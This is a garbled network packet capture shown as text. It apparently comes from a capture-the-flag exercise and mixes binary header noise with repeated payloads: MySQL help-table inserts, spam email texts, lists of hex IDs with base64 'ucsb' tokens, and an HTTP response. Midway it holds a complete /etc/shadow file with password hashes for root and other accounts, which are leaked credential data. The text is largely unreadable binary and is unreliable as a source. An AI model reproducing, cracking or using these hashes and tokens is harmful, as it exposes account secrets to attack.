bb0`BiET@/Ԁo0SE<*@@  3P抟b  )\ BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATE VIEW statement that creates\nthe given view.\n','SHOW CREATE VIEW view_name',''),(344,'INTERVAL',26,' INTERVAL(N,N1,N2,N3,...)\nReturns 0 if N < N1, 1 if N < N2\nand so on or -1 if N is NULL. All arguments are treated\nas integers. It is required that N1 < N2 < N3 <\n... < Nn for this function to work correctly. This is because\na binary search is used (very fast).\n','mysql> SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysqlCS ZZBi0`EL@/܂Sŀo0E4Sd@? 3 PtW'tu )pcCT ZZ0`BiEL@/go0AE4Sd@@ 3 PtW'tu )pcCU bbBi0`ET@/p܂Ao0E<*@?  3P뒟b  )\> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-08-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8',''),(349,'INET_NTOA',21,' INET_NTOA(expr)\nGiven a numeric network address (4 or 8 byte), returns the dotted-quad\nrepresentation of the address as a string.\n','mysql> SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThis statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSCU ZZBi0`EL@/uAo0E4U@?d*  3Pɣ6 5B  )^CU bb0`BiET@/Ԁo0SE<*@@  3P뒟b  )\> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-08-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8',''),(349,'INET_NTOA',21,' INET_NTOA(expr)\nGiven a numeric network address (4 or 8 byte), returns the dotted-quad\nrepresentation of the address as a string.\n','mysql> SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThis statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSC V ZZ0`BiEL@/܀o0SE4U@@c*  3Pɣ6 5B  )^C/_ ZZBi0`EL@/܂Sŀo0E4Sf@? 3 PtW!'tk )pgC@_ ZZ0`BiEL@/go0AE4Sf@@ 3 PtW!'tk )pgC"a bbBi0`ET@/أ  o0E<@?j  3PZiD. yF `x):ort on this process I have developed and did some research on how to get this information around to the right people. I\'ve contacted many spammers and did some price research, what better way to find the Spam haters then to find the spammer that is spamming them. I\'ve talked to many well known bulkers as they like to be called and we made the agreement that I will get to advertise to there list in return for a profit break. I\'m forced to sell my report for the reason to pay the advertising fee and keep me alive but on the bright side you will learn to fight against the horrible porn mail in your email box. Please join me in fighting this horrible advertising method that has been on the Internet for years. Remember, \'Together we stand, divided we fall.\' To order my detailed report and provide your help in fighting spam send $15 to the address below and lets all, together, put a stop to spam once and for all. K.C. Smith 10 East Louisiana Evansville, IN 47711 Thank you for your support in this matter. Your friend and best man in fight against spam.',43),(4,'yLd','DEAR RECEIVER, You have just received a Taliban virus. Since we are not so technologicaly advanced in Afghanistan, this is a MANUAL virus. Please delete all the files on your hard disk yourself and send tC)a ZZBi0`EL@/܂Sŀo0E4@? 3 PbO)x )q:C:a bb0`BiET@/Ԁo0SE<@@i  3PZiD. yF `x):ort on this process I have developed and did some research on how to get this information around to the right people. I\'ve contacted many spammers and did some price research, what better way to find the Spam haters then to find the spammer that is spamming them. I\'ve talked to many well known bulkers as they like to be called and we made the agreement that I will get to advertise to there list in return for a profit break. I\'m forced to sell my report for the reason to pay the advertising fee and keep me alive but on the bright side you will learn to fight against the horrible porn mail in your email box. Please join me in fighting this horrible advertising method that has been on the Internet for years. Remember, \'Together we stand, divided we fall.\' To order my detailed report and provide your help in fighting spam send $15 to the address below and lets all, together, put a stop to spam once and for all. K.C. Smith 10 East Louisiana Evansville, IN 47711 Thank you for your support in this matter. Your friend and best man in fight against spam.',43),(4,'yLd','DEAR RECEIVER, You have just received a Taliban virus. Since we are not so technologicaly advanced in Afghanistan, this is a MANUAL virus. Please delete all the files on your hard disk yourself and send tCEa ZZ0`BiEL@/go0AE4@@ 3 PbO)x )q:Cd ZZBi0`EL@/܂Sŀo0E4Sh@? 3 PtW1'ta )qjC d ZZ0`BiEL@/go0AE4Sh@@ 3 PtW1'ta )qjChj bbBi0`ET@/u܂Ao0E<@?%x  3P  )cCzj bb0`BiET@/Ԁo0SE<@@$x  3P  )cC$u ZZBi0`EL@/܂Sŀo0E4Sj@? 3 PtWA'tW )rlC5u ZZ0`BiEL@/go0AE4Sj@@ 3 PtWA'tW )rlCx bbBi0`ET@/p܂Ao0E<^@?U  3P|u}U !T  )cctory in which the client program was started.\n\n --- If LOCAL is not specified, the\nfile must be located on the server host and is read directly by the server.\n\n\nLOCAL is available in MySQL 3.22.6 or later.\n\nWhen locating files on the server host, the server uses the following rules:\n\n --- If an absolute pathname is given, the server uses the pathname as is.\n\n --- If a relative pathname with one or more leading components is given,\nthe server searches for the file relative to the server\'s data directory.\n\n --- If a filename with no leading components is given, the server looks for\nthe file in the database directory of the default database.\n\nNote that these rules mean that a file named as *./myfile.txt is read from\nthe server\'s data directory, whereas the same file named as *myfile.txt is\nread from the database directory of the default database. For example,\nthe following LOAD DATA statement reads the file *data.txt\nfrom the database directory for db1 because db1 is the current\ndatabase, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nmysql> USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashesCx bb0`BiET@/Ԁo0SE<^@@T  3P|u}U !T  )cctory in which the client program was started.\n\n --- If LOCAL is not specified, the\nfile must be located on the server host and is read directly by the server.\n\n\nLOCAL is available in MySQL 3.22.6 or later.\n\nWhen locating files on the server host, the server uses the following rules:\n\n --- If an absolute pathname is given, the server uses the pathname as is.\n\n --- If a relative pathname with one or more leading components is given,\nthe server searches for the file relative to the server\'s data directory.\n\n --- If a filename with no leading components is given, the server looks for\nthe file in the database directory of the default database.\n\nNote that these rules mean that a file named as *./myfile.txt is read from\nthe server\'s data directory, whereas the same file named as *myfile.txt is\nread from the database directory of the default database. For example,\nthe following LOAD DATA statement reads the file *data.txt\nfrom the database directory for db1 because db1 is the current\ndatabase, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nmysql> USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashesCz bbBi0`ET@/أ  o0E<|%@?  PeZ>̀ _ `~dl18031,ucsb,MTNzEwEDA7/Nh5+Qm/bZxPi/Qivi7SqzEyrPxA==
3B50C04FFDDD1E968C9178D32FF01292,ucsb,MTNzEwEDA8DK1KodZXTWeiprRUKR4OAbSOmWdw==
F1D58D69DB5F9E2923DA7BB28021BF8F,ucsb,MTNzEwEDA8EMKkRdTp0bBegaQ4U2IW159Aqprg==
7268078E4076662211A12D1EE5230BD1,ucsb,MTNzEwEDA8L4I6ywUdFoJzILi/GjW3wHQKrxEg==
DB853B1986B0523DA8438AEF174D9D46,ucsb,MTNzEwEDA8MUVutgvpBmIn+5x6i9UtlEu01/LA==
68DD883FDDE6A585D8E0CCE261B3A16C,ucsb,MTNzEwEDA8TFuSMy37tfy9MeYZbj9cTwyAmthQ==
B0C1956B008925F637521D3B48934F34,ucsb,MTNzEwEDA8WEJNYiW1kBpU9mICHw2/3Zf59szA==
49A90DE376B02ED50DAC4E88FF3C53F5,ucsb,MTNzEwEDA8ZC9nPyGu/OABfJcHNP62PpJ2rf/w==
FFB8C5CD2B5F12CF3A0D07A49855C038,ucsb,MTNzEwEDA8e3ogdnBFiLGypAxOB5PhC5c4cX7A==
2194ABAC9BE58466CDF1140B2EA87B94,ucsb,MTNzEwEDA8jl/4qHrnvCehTPxR5h9NOAKwobpw==
084BC9FAE995F51D08149B1601BD8066,ucsb,MTNzEwEDA8mlyjNCf97WcSdiwgj4ohizc/I4ug==
FD51F198FD5EB713A67996C3CB7C2A80,ucsb,MTNzEwEDA8oEJNa57ytNZTFK2ytvGeAPV72f7Q==
C267BF551CF8F20332CA7109E2C63938,ucsb,MTNzEwEDA8s5k2UpWUs8EfodQTmROlSBkJQ7CQ==
EF118EBA81F25078F04F2376F6D78CE7,ucsb,MTNzEwEDA8w4UlsmzEE1X4VDrXoZcVESUpNodw==
94E84A22D014AECF27C6FCAFFC8C4527,ucsb,MTNzEwEDA85i75sSWctGNpNAYyQaS7Ot2Dti0A==
6D6F502B2D8A48CE11BEE0B11804A73C,ucsb,MTNzEwEDA88epXP5Dx4fWacMwcnhoKjMCz bb0`BiET@/o0AE<|%@@  PeZ>̀ _ `~dl18031,ucsb,MTNzEwEDA7/Nh5+Qm/bZxPi/Qivi7SqzEyrPxA==
3B50C04FFDDD1E968C9178D32FF01292,ucsb,MTNzEwEDA8DK1KodZXTWeiprRUKR4OAbSOmWdw==
F1D58D69DB5F9E2923DA7BB28021BF8F,ucsb,MTNzEwEDA8EMKkRdTp0bBegaQ4U2IW159Aqprg==
7268078E4076662211A12D1EE5230BD1,ucsb,MTNzEwEDA8L4I6ywUdFoJzILi/GjW3wHQKrxEg==
DB853B1986B0523DA8438AEF174D9D46,ucsb,MTNzEwEDA8MUVutgvpBmIn+5x6i9UtlEu01/LA==
68DD883FDDE6A585D8E0CCE261B3A16C,ucsb,MTNzEwEDA8TFuSMy37tfy9MeYZbj9cTwyAmthQ==
B0C1956B008925F637521D3B48934F34,ucsb,MTNzEwEDA8WEJNYiW1kBpU9mICHw2/3Zf59szA==
49A90DE376B02ED50DAC4E88FF3C53F5,ucsb,MTNzEwEDA8ZC9nPyGu/OABfJcHNP62PpJ2rf/w==
FFB8C5CD2B5F12CF3A0D07A49855C038,ucsb,MTNzEwEDA8e3ogdnBFiLGypAxOB5PhC5c4cX7A==
2194ABAC9BE58466CDF1140B2EA87B94,ucsb,MTNzEwEDA8jl/4qHrnvCehTPxR5h9NOAKwobpw==
084BC9FAE995F51D08149B1601BD8066,ucsb,MTNzEwEDA8mlyjNCf97WcSdiwgj4ohizc/I4ug==
FD51F198FD5EB713A67996C3CB7C2A80,ucsb,MTNzEwEDA8oEJNa57ytNZTFK2ytvGeAPV72f7Q==
C267BF551CF8F20332CA7109E2C63938,ucsb,MTNzEwEDA8s5k2UpWUs8EfodQTmROlSBkJQ7CQ==
EF118EBA81F25078F04F2376F6D78CE7,ucsb,MTNzEwEDA8w4UlsmzEE1X4VDrXoZcVESUpNodw==
94E84A22D014AECF27C6FCAFFC8C4527,ucsb,MTNzEwEDA85i75sSWctGNpNAYyQaS7Ot2Dti0A==
6D6F502B2D8A48CE11BEE0B11804A73C,ucsb,MTNzEwEDA88epXP5Dx4fWacMwcnhoKjMCz ZZBi0`EL@/܂Sŀo0E4Sl@? 3 PtXQ'tM )roCz ZZ0`BiEL@/go0AE4Sl@@ 3 PtXQ'tM )roCp} bbBi0`ET@/p܂Ao0E<_@?U  3Pʄu}U   )c. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(332,'BLOB TYPE',1,' BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535\n(2^16 - 1) bytes.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest BLOB type largest\nenough to hold values M bytes long.\n','',''),(333,'LOCALTIME',14,' LOCALTIME\n LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for\nNOW().\n','',''),(334,'MPOINTFROMTEXT',3,' MPointFromText(wkt[,srid])\n MultiPointFromText(wkt[,srid])\nConstructs a MULTIPOINT value using its WKT representation and SRID.\n','',''),(335,'BLOB',1,'A BLOB is a binary large object that can hoCw} ZZBi0`EL@/$T<o0E4I@?܃  PձˮLU  1T7=xWC} bb0`BiET@/Ԁo0SE<_@@T  3Pʄu}U   )c. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(332,'BLOB TYPE',1,' BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535\n(2^16 - 1) bytes.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest BLOB type largest\nenough to hold values M bytes long.\n','',''),(333,'LOCALTIME',14,' LOCALTIME\n LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for\nNOW().\n','',''),(334,'MPOINTFROMTEXT',3,' MPointFromText(wkt[,srid])\n MultiPointFromText(wkt[,srid])\nConstructs a MULTIPOINT value using its WKT representation and SRID.\n','',''),(335,'BLOB',1,'A BLOB is a binary large object that can hoC} ZZʪBiEL@/o0o0oE4I@@ܢ  PձˮLU  1T7=xWCX Bi0`E@/o+?o0E;o>#  root:$1$uNwCQL3Q$JnPeD1BkAYUBvzdfQvU0l0:17874:0:99999:7::: daemon:*:12745:0:99999:7::: bin:*:12745:0:99999:7::: sys:*:12745:0:99999:7::: sync:*:12745:0:99999:7::: games:*:12745:0:99999:7::: man:*:12745:0:99999:7::: lp:*:12745:0:99999:7::: mail:*:12745:0:99999:7::: news:*:12745:0:99999:7::: uucp:*:12745:0:99999:7::: proxy:*:12745:0:99999:7::: www-data:*:12745:0:99999:7::: backup:*:12745:0:99999:7::: list:*:12745:0:99999:7::: irc:*:12745:0:99999:7::: gnats:*:12745:0:99999:7::: nobody:*:12745:0:99999:7::: Debian-exim:!:12745:0:99999:7::: identd:!:12745:0:99999:7::: sshd:!:12745:0:99999:7::: mysql:!:12751:0:99999:7::: foobar:$1$SUSKcx/j$LYYPzdu94fVYF0rhuR9nO/:12809:0:99999:7::: agent:$1$nTu4SIJA$TYWGCB7nO7VpGMgMS94nh.:12810:0:99999:7::: spammerd:!$1$k/dCLrgb$RGXSZn54WiCGAmwKbHWsq/:13122:0:99999:7::: ftp:!:13122:0:99999:7::: museum:$1$l25JxcZc$6O8DwBVK7xSDVEY8/w9HJ1:13122:0:99999:7::: spam:$1$HT8VX0iA$ctNYFaZVnW/nh6IF76vmN0:13122:0:99999:7::: aqs:$1$wxpxZwKC$ZuHITwaPyMEdPteaQkXwz0:13122:0:99999:7::: contribute:$1$r5jTi6QI$.lavlfaRrXIsPnIllxzU0.:13124:0:99999:7::: acquire:$1$/nDJ9YXL$LPhwqeKT3zR0rdVmfXvaZ0:13122:0:99999:7::: spamometer:$1$pp9MiALd$VwdixHwdXwTVmLqq4EhwB.:13122:0:99999:7::: spamagent:$1$mOUEpd5O$A9qLwPfeQG2DxL70wXuSS.:13123:0:99999:7::: spamdb:$1$cRjoLSNp$OhEJzJOXnsj5/worPlvP.1:13123:0:99999:7::: spamgen:$1$aF/RJxSr$w3jcT6tuJ33wlLnUaKQ/h0:13123:0:99999:7::: tomcat5:!:1Cl BeBiE@/o0o0E;o@!  root:$1$uNwCQL3Q$JnPeD1BkAYUBvzdfQvU0l0:17874:0:99999:7::: daemon:*:12745:0:99999:7::: bin:*:12745:0:99999:7::: sys:*:12745:0:99999:7::: sync:*:12745:0:99999:7::: games:*:12745:0:99999:7::: man:*:12745:0:99999:7::: lp:*:12745:0:99999:7::: mail:*:12745:0:99999:7::: news:*:12745:0:99999:7::: uucp:*:12745:0:99999:7::: proxy:*:12745:0:99999:7::: www-data:*:12745:0:99999:7::: backup:*:12745:0:99999:7::: list:*:12745:0:99999:7::: irc:*:12745:0:99999:7::: gnats:*:12745:0:99999:7::: nobody:*:12745:0:99999:7::: Debian-exim:!:12745:0:99999:7::: identd:!:12745:0:99999:7::: sshd:!:12745:0:99999:7::: mysql:!:12751:0:99999:7::: foobar:$1$SUSKcx/j$LYYPzdu94fVYF0rhuR9nO/:12809:0:99999:7::: agent:$1$nTu4SIJA$TYWGCB7nO7VpGMgMS94nh.:12810:0:99999:7::: spammerd:!$1$k/dCLrgb$RGXSZn54WiCGAmwKbHWsq/:13122:0:99999:7::: ftp:!:13122:0:99999:7::: museum:$1$l25JxcZc$6O8DwBVK7xSDVEY8/w9HJ1:13122:0:99999:7::: spam:$1$HT8VX0iA$ctNYFaZVnW/nh6IF76vmN0:13122:0:99999:7::: aqs:$1$wxpxZwKC$ZuHITwaPyMEdPteaQkXwz0:13122:0:99999:7::: contribute:$1$r5jTi6QI$.lavlfaRrXIsPnIllxzU0.:13124:0:99999:7::: acquire:$1$/nDJ9YXL$LPhwqeKT3zR0rdVmfXvaZ0:13122:0:99999:7::: spamometer:$1$pp9MiALd$VwdixHwdXwTVmLqq4EhwB.:13122:0:99999:7::: spamagent:$1$mOUEpd5O$A9qLwPfeQG2DxL70wXuSS.:13123:0:99999:7::: spamdb:$1$cRjoLSNp$OhEJzJOXnsj5/worPlvP.1:13123:0:99999:7::: spamgen:$1$aF/RJxSr$w3jcT6tuJ33wlLnUaKQ/h0:13123:0:99999:7::: tomcat5:!:1CQ ZZBi0`EL@/܂Sŀo0E4@? 3 P}[$ )spCc ZZ0`BiEL@/go0AE4@@ 3 P}[$ )spC8 bbBi0`ET@/p܂Ao0E<6@?  3P}[ U  )dand to defragment the data file.\n','CHECKSUM TABLE tbl_name [, tbl_name] ... [ QUICK | EXTENDED ]',''),(73,'ENDPOINT',18,' EndPoint(ls)\nReturns the Point that is the end point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(EndPoint(GeomFromText(@ls)));\n+-------------------------------------+\n| AsText(EndPoint(GeomFromText(@ls))) |\n+-------------------------------------+\n| POINT(3 3) |\n+-------------------------------------+',''),(74,'CACHE INDEX',6,'The CACHE INDEX statement assigns table indexes to a specific key\ncache. It is used only for MyISAM tables.\n\nThe following statement assigns indexes from the tables t1,\nt2, and t3 to the key cache named hot_cache:\n\nmysql> CACHE INDEX t1, t2, t3 IN hot_cache;\n+---------+--------------------+----------+----------+\n| Table | Op | Msg_type | Msg_text |\n+---------+--------------------+----------+----------+\n| test.t1 | assign_to_keycache | status | OK |\n| test.t2 | assign_to_keycache | status | OK |\n| test.t3 | assign_to_keycache | status | OK |\n+---------+--------------------+----------+----------+\n','CACHE INDEX\n tbl_index_list [, tbl_index_list] ...\n IN key_cache_name\n\ntbl_indeCK bb0`BiET@/Ԁo0SE<6@@  3P}[ U  )dand to defragment the data file.\n','CHECKSUM TABLE tbl_name [, tbl_name] ... [ QUICK | EXTENDED ]',''),(73,'ENDPOINT',18,' EndPoint(ls)\nReturns the Point that is the end point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(EndPoint(GeomFromText(@ls)));\n+-------------------------------------+\n| AsText(EndPoint(GeomFromText(@ls))) |\n+-------------------------------------+\n| POINT(3 3) |\n+-------------------------------------+',''),(74,'CACHE INDEX',6,'The CACHE INDEX statement assigns table indexes to a specific key\ncache. It is used only for MyISAM tables.\n\nThe following statement assigns indexes from the tables t1,\nt2, and t3 to the key cache named hot_cache:\n\nmysql> CACHE INDEX t1, t2, t3 IN hot_cache;\n+---------+--------------------+----------+----------+\n| Table | Op | Msg_type | Msg_text |\n+---------+--------------------+----------+----------+\n| test.t1 | assign_to_keycache | status | OK |\n| test.t2 | assign_to_keycache | status | OK |\n| test.t3 | assign_to_keycache | status | OK |\n+---------+--------------------+----------+----------+\n','CACHE INDEX\n tbl_index_list [, tbl_index_list] ...\n IN key_cache_name\n\ntbl_indeC bbBi0`ET@/˃2o0E SELECT LENGTH(COMPRESS(REPEAT(\'a\',1000)));\n -> 21\nmysql> SELECT LENGTH(COMPRESS(\'\'));\n -> 0\nmysql> SELECT LENGTH(COMPRESS(\'a\'));\n -> 13\nmysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',16)));\n -> 15',''),(76,'COUNT',12,' COUNT(expr)\nReturns a count of the number of non-NULL values in the rows\nretrieved by a SELECT statement.\n','mysql> SELECT student.student_name,COUNT(*)\n -> FROM student,course\n -> WHERE student.student_id=course.student_id\n -> GROUP BY student_name;',''),(77,'INSERT',23,' INSERT(str,pos,len,newstr)\nReturns the string str, with the substring beginning at position\npos and len characters long replaced by the string\nnewstr. Returns the original string if pos is not within\nthe length of the string. Replaces the rest of the string from position\npos is len is not within the length of the rest of the string.\nReturns NULL if any aC bb0`BiET@/Ԁo0SE<6@@  3Pc H  )ex_list:\n tbl_name [[INDEX|KEY] (index_name[, index_name] ...)]',''),(75,'COMPRESS',23,' COMPRESS(string_to_compress)\nCompresses a string. This function requires MySQL to have been compiled\nwith a compression library such as zlib. Otherwise, the return\nvalue is always NULL. The compressed string can be uncompressed with\nUNCOMPRESS().\n','mysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',1000)));\n -> 21\nmysql> SELECT LENGTH(COMPRESS(\'\'));\n -> 0\nmysql> SELECT LENGTH(COMPRESS(\'a\'));\n -> 13\nmysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',16)));\n -> 15',''),(76,'COUNT',12,' COUNT(expr)\nReturns a count of the number of non-NULL values in the rows\nretrieved by a SELECT statement.\n','mysql> SELECT student.student_name,COUNT(*)\n -> FROM student,course\n -> WHERE student.student_id=course.student_id\n -> GROUP BY student_name;',''),(77,'INSERT',23,' INSERT(str,pos,len,newstr)\nReturns the string str, with the substring beginning at position\npos and len characters long replaced by the string\nnewstr. Returns the original string if pos is not within\nthe length of the string. Replaces the rest of the string from position\npos is len is not within the length of the rest of the string.\nReturns NULL if any aC ))Bi0`E@/xo+?o0E0@>/  P:! )  77;'HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:43:48 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 X-Powered-By: PHP/4.4.0-4 Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 414 Connection: close Content-Type: text/xml mQKS0+p0ޤ:Eǣ6+-Yߛ p~}ߒHUx{27;#nj̣hZCӳ<{ͭAݳB4,AƔpDK`%K,l5`SJZkQn\ XVay>CLk+c7&b1fd$q hB>GIdEMdh$C8.ߓM9(r4UX H "4<^uڠP`7Z~@,/ g,_G6ȫ W JfAS?U }ڨ5z,t>CLk+c7&b1fd$q hB>GIdEMdh$C8.ߓM9(r4UX H "4<^uڠP`7Z~@,/ g,_G6ȫ W JfAS?U }ڨ5z,t>̀  `dlXknYqA==
D90C42A4D5AC0920CE8E37F19F85159D,ucsb,MTNzEwEDA9A2nzj/eohnOoyM85Tz1FxhF/teDg==
6EED6EEB03FCEFB773DAFDA67688C91D,ucsb,MTNzEwEDA9GhIPtafM5+vlLImVRmgmiQydnv8A==
19ACE568C0B990DA4583EFC325D4DA41,ucsb,MTNzEwEDA9IWsC+OZ4oZGsWr6AcZ21H53th1eA==
C5291684F34D19D69E0A744A3D7BFC9E,ucsb,MTNzEwEDA9P4U6sWy21ss2E3e+Q3v4ml5wGxwg==
8048ADA03B04ABC1D6B8D756903253D5,ucsb,MTNzEwEDA9T4HrpG9UXBz/dMXyILdU4IXN2YKw==
8AB9F935491BBB1FC9E9B1CE2A1F76CC,ucsb,MTNzEwEDA9Ui4vq8ym5LuEHg89bYW5wJkI6JwQ==
6B59800F931979AEF189E878C05C6ADC,ucsb,MTNzEwEDA9bO32wctvffCy14CJYxuJPbPxhw+w==
E84F1D6F8DE3091A1A88B026503CE420,ucsb,MTNzEwEDA9fTQnpy27Smvo9tPiy/Vx5ExM1KQw==
CD3CA3B096A45240A6366EB1724CE1B1,ucsb,MTNzEwEDA9jaOc8TXJyf8PURveflMRfV2Y+SDA==
6EE05B9D5B96FD4E5C068CBF50645684,ucsb,MTNzEwEDA9l0NmPFXwfWviuuzL0krh2dqYl/jQ==
567559B86796A2820663C64D14616DF9,ucsb,MTNzEwEDA9oUe1XzZJbD/NqYBa8sZzlw831rHw==
13E1CB29B6D111F1C55D84667802909B,ucsb,MTNzEwEDA9v7xYtKQ83VuE9doQlAwwibnJRhcw==
C11B10368841BD22741DB04BB6F7D814,ucsb,MTNzEwEDA9zn6P4bxyG2cqYKu4uJFktjUk2MKw==
0D33B1F75D283043BAEFBAF5AEA25D80,ucsb,MTNzEwEDA930nbikOUPpv1wwasH41umAEUwTVw==
8CA4A6BD872A7E239C584C330C3A3344,ucsb,MTNzEwEDA97UdywYxjotAZHB0O1bwtSnL+xn3w==
C958815D32E03D3F1F6238243F3F22C bb0`BiET@/o0AE<|&@@  PeZ>̀  `dlXknYqA==
D90C42A4D5AC0920CE8E37F19F85159D,ucsb,MTNzEwEDA9A2nzj/eohnOoyM85Tz1FxhF/teDg==
6EED6EEB03FCEFB773DAFDA67688C91D,ucsb,MTNzEwEDA9GhIPtafM5+vlLImVRmgmiQydnv8A==
19ACE568C0B990DA4583EFC325D4DA41,ucsb,MTNzEwEDA9IWsC+OZ4oZGsWr6AcZ21H53th1eA==
C5291684F34D19D69E0A744A3D7BFC9E,ucsb,MTNzEwEDA9P4U6sWy21ss2E3e+Q3v4ml5wGxwg==
8048ADA03B04ABC1D6B8D756903253D5,ucsb,MTNzEwEDA9T4HrpG9UXBz/dMXyILdU4IXN2YKw==
8AB9F935491BBB1FC9E9B1CE2A1F76CC,ucsb,MTNzEwEDA9Ui4vq8ym5LuEHg89bYW5wJkI6JwQ==
6B59800F931979AEF189E878C05C6ADC,ucsb,MTNzEwEDA9bO32wctvffCy14CJYxuJPbPxhw+w==
E84F1D6F8DE3091A1A88B026503CE420,ucsb,MTNzEwEDA9fTQnpy27Smvo9tPiy/Vx5ExM1KQw==
CD3CA3B096A45240A6366EB1724CE1B1,ucsb,MTNzEwEDA9jaOc8TXJyf8PURveflMRfV2Y+SDA==
6EE05B9D5B96FD4E5C068CBF50645684,ucsb,MTNzEwEDA9l0NmPFXwfWviuuzL0krh2dqYl/jQ==
567559B86796A2820663C64D14616DF9,ucsb,MTNzEwEDA9oUe1XzZJbD/NqYBa8sZzlw831rHw==
13E1CB29B6D111F1C55D84667802909B,ucsb,MTNzEwEDA9v7xYtKQ83VuE9doQlAwwibnJRhcw==
C11B10368841BD22741DB04BB6F7D814,ucsb,MTNzEwEDA9zn6P4bxyG2cqYKu4uJFktjUk2MKw==
0D33B1F75D283043BAEFBAF5AEA25D80,ucsb,MTNzEwEDA930nbikOUPpv1wwasH41umAEUwTVw==
